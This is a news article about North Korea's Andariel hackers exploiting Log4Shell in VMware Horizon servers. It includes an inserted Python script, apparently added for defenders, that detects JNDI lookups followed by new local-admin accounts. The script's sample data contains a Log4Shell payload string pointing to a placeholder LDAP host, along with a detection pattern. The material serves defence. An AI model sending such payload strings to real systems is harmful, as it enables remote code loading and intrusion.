North Korean hackers are still exploiting Log4Shell around the world.
Andariel specializes in obtaining initial access and persistence for longer-term espionage campaigns in service of the Kim Jong Un regime.
In some cases it has carried out its own ransomware attacks against healthcare organizations.
As Cisco Talos head of outreach Nick Biasini emphasizes, this combination of espionage and ransomware is what sets North Korea's hackers apart.
Andariel's Latest Cyberattacks

Andariel's recent attacks began by exploiting exposed VMware Horizon servers carrying Log4Shell, the now 2-year-old historic vulnerability in Apache Log4j.
Next, they created new users with administrative privileges on the host machine, which they used to download credential harvesting software like Mimikatz and, ultimately, their custom malware tools.
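The two steps just described (a Log4Shell lookup string reaching an internet-facing Horizon host, followed shortly by a new account being added to the local Administrators group) are exactly the kind of sequence a defender can correlate in telemetry. The following is an added illustration, not code from the Dark Reading piece or from Cisco Talos, and it runs over constructed sample events: the host names, timestamps, the documentation-range IP, and the simplified rendering of Windows Security events 4720 (account created) and 4732 (member added to a local group) as `Key=Value` text are all assumptions made for the example.

```python
import re
from datetime import datetime, timedelta

# Constructed sample telemetry (not taken from the article). Each event is
# (timestamp, host, source, text). "http" is a web-access line from an
# internet-facing Horizon host; "winsec" is a simplified rendering of a
# Windows Security event. Field names are an assumption for this example.
SAMPLE_EVENTS = [
    ("2023-12-01T10:00:00", "horizon-01", "http",
     'GET /portal/ HTTP/1.1 ua="${jndi:ldap://203.0.113.5/a}" 200'),
    ("2023-12-01T10:04:10", "horizon-01", "winsec",
     "EventID=4720 TargetUserName=svc_update SubjectUserName=horizon-01$"),
    ("2023-12-01T10:04:12", "horizon-01", "winsec",
     "EventID=4732 TargetUserName=Administrators MemberName=svc_update"),
    # Benign activity on another host: a helpdesk user creates an account and
    # adds it to Remote Desktop Users, not Administrators, with no prior JNDI hit.
    ("2023-12-01T11:30:00", "horizon-02", "winsec",
     "EventID=4720 TargetUserName=jdoe SubjectUserName=helpdesk"),
    ("2023-12-01T11:30:05", "horizon-02", "winsec",
     "EventID=4732 TargetUserName=Remote Desktop Users MemberName=jdoe"),
]

# The canonical Log4Shell indicator: a JNDI lookup inside a Log4j "${...}" expression.
# Case-insensitive and tolerant of whitespace; nested-lookup obfuscation would need
# normalization that is out of scope here.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Parse "Key=Value Key=Value" text; values may contain spaces (e.g. group names).
FIELD = re.compile(r"(\w+)=(.+?)(?=\s\w+=|$)")


def parse_fields(text):
    """Turn 'EventID=4732 TargetUserName=Administrators ...' into a dict."""
    return dict(FIELD.findall(text))


def jndi_attempts(events):
    """Return (timestamp, host) for every HTTP line carrying a JNDI lookup string."""
    return [(ts, host) for ts, host, src, text in events
            if src == "http" and JNDI_LOOKUP.search(text)]


def privileged_account_creations(events):
    """Pair a 4720 (account created) with a later 4732 that adds the same
    account to the local Administrators group on the same host."""
    created = {}  # (host, username) -> creation timestamp
    hits = []
    for ts, host, src, text in events:
        if src != "winsec":
            continue
        f = parse_fields(text)
        if f.get("EventID") == "4720":
            created[(host, f["TargetUserName"])] = ts
        elif f.get("EventID") == "4732" and f.get("TargetUserName") == "Administrators":
            member = f["MemberName"]
            if (host, member) in created:
                hits.append((ts, host, member))
    return hits


def correlate(events, window=timedelta(minutes=30)):
    """Flag hosts where a freshly created local admin appears within `window`
    after a JNDI lookup attempt against that same host."""
    findings = []
    attempts = jndi_attempts(events)
    for ts, host, user in privileged_account_creations(events):
        added_at = datetime.fromisoformat(ts)
        for attempt_ts, attempt_host in attempts:
            attempted_at = datetime.fromisoformat(attempt_ts)
            if attempt_host == host and attempted_at <= added_at <= attempted_at + window:
                findings.append({
                    "host": host,
                    "new_admin": user,
                    "exploit_attempt_at": attempt_ts,
                    "admin_added_at": ts,
                })
    return findings


if __name__ == "__main__":
    for finding in correlate(SAMPLE_EVENTS):
        print(finding)
```

On the sample data only `horizon-01` is flagged: it saw a JNDI lookup string and, four minutes later, a newly created account joined Administrators. The `horizon-02` activity is ignored both because no lookup attempt preceded it and because the group involved is not Administrators. In a real pipeline the 4732 member would arrive as a SID plus distinguished name rather than a bare username, so resolving the SID before matching is the main adaptation needed.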
These new tools do stand out for being written in D, a 22-year-old offshoot of C++.

The Exceptional Range of DPRK Hackers

Some hackers achieve stealth with living-off-the-land techniques.
Some use code obfuscation, steganography, and more elaborate tricks.
In contrast, North Korean hackers, seemingly more than anyone else, resist detection and analysis by building custom malware in bulk, using old, unloved programming languages their adversaries aren't expecting.
Novel malware, which the DPRK creates plenty of, defeats antivirus scans that look for specific signatures, and oddball languages like D add a layer of difficulty for analysis tools and analysts accustomed to more common ones.
It's for this reason that Lazarus attacks demand a bit of extra vigilance.
This Cyber News was published on www.darkreading.com. Publication date: Mon, 11 Dec 2023 16:25:18 +0000